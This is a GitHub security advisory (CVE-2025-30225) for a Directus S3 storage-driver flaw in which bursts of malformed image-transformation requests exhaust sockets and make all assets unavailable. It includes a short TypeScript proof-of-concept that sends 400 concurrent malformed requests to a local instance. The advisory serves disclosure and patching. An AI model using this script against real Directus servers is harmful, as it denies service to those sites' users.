{ "schema_version": "1.4.0", "id": "GHSA-j8xj-7jff-46mx", "modified": "2025-03-27T03:42:48Z", "published": "2025-03-26T17:19:28Z", "aliases": [ "CVE-2025-30225" ], "summary": "Directus's S3 assets become unavailable after a burst of malformed transformations", "details": "### Summary\nWhen making many malformed transformation requests at once, at some point, all assets are being served as 403.\n\n### Details\nWhen I was investigating this issue, I have found that after a burst of malformed asset transformation requests, the amount of `sockets` held on [Agent on NodeHttpHandler](https://github.com/smithy-lang/smithy-typescript/blob/main/packages/node-http-handler/src/node-http-handler.ts#L189) was always equal to [`STORAGE_CLOUD_MAX_SOCKETS`](https://github.com/directus/directus/blob/main/packages/storage-driver-s3/src/index.ts#L89) making it impossible to have new connections causing assets to be inaccessible.\n\nAfter looking into this [issue on AWS SDK](https://github.com/aws/aws-sdk-js-v3/issues/6691) I found that if the [stream is requested](https://github.com/directus/directus/blob/main/api/src/services/assets.ts#L213), it needs to be consumed otherwise will hang forever. And as can be [seen here](https://github.com/directus/directus/blob/main/api/src/services/assets.ts#L184) the stream is not consumed, because `sharp` will throw an error on the invalid arguments. For example `?height=xyz`\n\nThe [timeouts set here](https://github.com/directus/directus/blob/main/packages/storage-driver-s3/src/index.ts#L87-L88) had no noticeable effect on tests made.\n\n### PoC\nThis can be easily reproduced with the following steps:\n- setup AWS S3 storage\n- set STORAGE_CLOUD_MAX_SOCKETS: \"50\" (this value is lower than default for easier reproduction)\n- upload a file to your project\n- run this file (Replace the the file ID with the one you just uploaded):\n```ts\nimport axios from \"axios\";\n\nasync function start() {\n Array.from({ length: 400 }, (_, i) => {\n axios\n .get(\n \"http://localhost:8055/assets/e536aa35-3a81-4fa9-b856-3780584d38d8?width=100&height=XYZ\"\n )\n .then(() => console.log(\"✅\"))\n .catch((e) =>\n console.log(\"⛔\", e.response?.status || e.code || e.message)\n );\n });\n}\n\nstart();\n```\n\nHere's an example:\n\n\n\nhttps://github.com/user-attachments/assets/7f5a6f51-1c51-4d4d-aa4f-c4953e91714c\n\n\n\n\n\n### Impact\nThis causes denial of assets for all policies of Directus, including Admin and Public.", "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "affected": [ { "package": { "ecosystem": "npm", "name": "@directus/storage-driver-s3" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.22.0" }, { "fixed": "12.0.1" } ] } ] }, { "package": { "ecosystem": "npm", "name": "directus" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.22.0" }, { "fixed": "11.5.0" } ] } ] } ], "references": [ { "type": "WEB", "url": "https://github.com/directus/directus/security/advisories/GHSA-j8xj-7jff-46mx" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30225" }, { "type": "PACKAGE", "url": "https://github.com/directus/directus" } ], "database_specific": { "cwe_ids": [ "CWE-770" ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2025-03-26T17:19:28Z", "nvd_published_at": "2025-03-26T17:15:26Z" } }